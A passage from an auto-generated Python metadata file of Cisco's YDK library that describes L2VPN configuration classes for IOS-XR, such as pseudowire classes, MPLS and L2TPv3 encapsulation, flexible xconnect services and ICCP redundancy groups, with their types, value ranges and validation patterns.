''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
''' Pseudowire Switching Point Tlv
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
''' Back Up Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
''' List of Vlan-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Primary VLAN range, in the form of 1-3,5
,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Secondary VLAN range, in the form of 1-3,5
,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
